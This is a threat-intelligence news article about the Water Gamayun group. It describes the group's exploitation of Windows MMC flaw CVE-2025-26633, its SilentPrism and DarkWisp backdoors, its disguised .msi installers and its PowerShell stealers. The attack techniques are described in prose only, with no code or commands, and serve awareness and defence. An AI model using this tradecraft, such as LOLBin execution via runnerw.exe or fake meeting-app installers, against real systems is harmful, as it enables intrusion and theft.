Threat Actor Water Gamayun Deploys New Malware After Microsoft Windows Zero-Day Exploitation
Recent analysis has uncovered the activities of a notorious hacking group known as Water Gamayun, which is suspected of being linked to Russian cyber-operations. The group has been implicated in the exploitation of a crucial security vulnerability in Microsoft Windows, specifically targeting the Microsoft Management Console (MMC) framework with a zero-day vulnerability identified as CVE-2025-26633, also referred to as MSC EvilTwin. They have deployed two new backdoors, SilentPrism and DarkWisp, that represent a significant threat in the cybersecurity landscape.
Researchers from Trend Micro, namely Aliakbar Zahravi and Ahmed Mohamed Ibrahim, provided an in-depth analysis of the group’s tactics. They highlighted the use of malicious provisioning packages, as well as signed .msi files, to deliver these new malware variants. A notable technique employed is the execution of commands via the IntelliJ runnerw.exe, which allows the hackers to execute payloads covertly.
Water Gamayun’s recent activity comes after the group gained notoriety in late June 2024 for using a GitHub repository named "encrypthub" to distribute various malware families, such as stealers, miners, and ransomware. Their operational methods have evolved as they have transitioned to their own infrastructure for both staging purposes and command-and-control functions.
The attack chains initiated by Water Gamayun utilize multiple vectors, including provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files. This multifaceted approach enables them to install information-stealing malware and backdoors, which possess the capability for both persistence and data theft. The .msi installers masquerade as legitimate communication and meeting software, including popular platforms such as DingTalk, QQTalk, and VooV Meeting. These disguise tactics serve as a means to execute a PowerShell downloader that fetches and runs subsequent payloads on compromised systems.
The SilentPrism backdoor establishes persistence on infected machines, allowing its operators to execute several shell commands simultaneously. It also integrates anti-analysis techniques that enhance its evasion of detection. In parallel, DarkWisp enables reconnaissance of the system, the exfiltration of sensitive data, and the establishment of persistent connections to the command-and-control server.
Upon initiating contact with the C&C infrastructure, the malware enters a continuous interaction loop that waits for command instructions. This communication occurs through a TCP connection on port 8080, utilizing a commanding format that includes base64-encoded commands. The ability of the malware to maintain ongoing connectivity and securely transmit results underscores its sophisticated design.
Additionally, the operation deploys the MSC EvilTwin loader, designed to exploit the aforementioned CVE-2025-26633. This loader executes a malicious .msc file, subsequently leading to the deployment of the Rhadamanthys Stealer. The cleaning mechanisms incorporated within this loader help to eliminate traces, thereby complicating forensic analysis of the infection.
Rhadamanthys is just one of many stealers in Water Gamayun’s arsenal, as the group has also delivered another stealer called StealC, in addition to three variants of their bespoke PowerShell stealer. These variants are characterized by their capability to collect detailed system information, including antivirus details, installed software, network configurations, and running applications. They have also been observed extracting Wi-Fi passwords, Windows product keys, clipboard histories, and credentials from various messaging, VPN, FTP, and password management applications. The malware is particularly tailored to target files associated with cryptocurrency wallets, indicating a focused intent on gathering sensitive financial information.
Researchers have noted the similarities in functionalities across the EncryptHub variants, which are modified versions of the open-source Kematian Stealer. Notably, one variant stands out due to its methodology of employing a living-off-the-land binary (LOLBin) technique, utilizing the IntelliJ process launcher to indirectly execute remote PowerShell scripts on compromised systems.
The artifacts of this stealer, delivered through malicious .msi packages or binary dropper malware, have also been seen propagating additional malware families, including Lumma Stealer and Amadey, as well as clipping tools.
Further investigation into Water Gamayun’s command-and-control infrastructure revealed their use of PowerShell scripts to download AnyDesk software, enabling remote access. This flexibility allows operators to send base64-encoded commands to victim machines, showcasing the intricate complexity of their operations.
Overall, Water Gamayun’s adaptability in employing various methods to compromise systems underscores the evolving nature of cyber threats faced by individuals and organizations alike. Their extensive malware arsenal and sophisticated command-and-control capabilities present significant challenges in the realm of cybersecurity. In light of these developments, continuous surveillance and advanced defensive strategies remain imperative for countering such increasingly sophisticated cyber threats.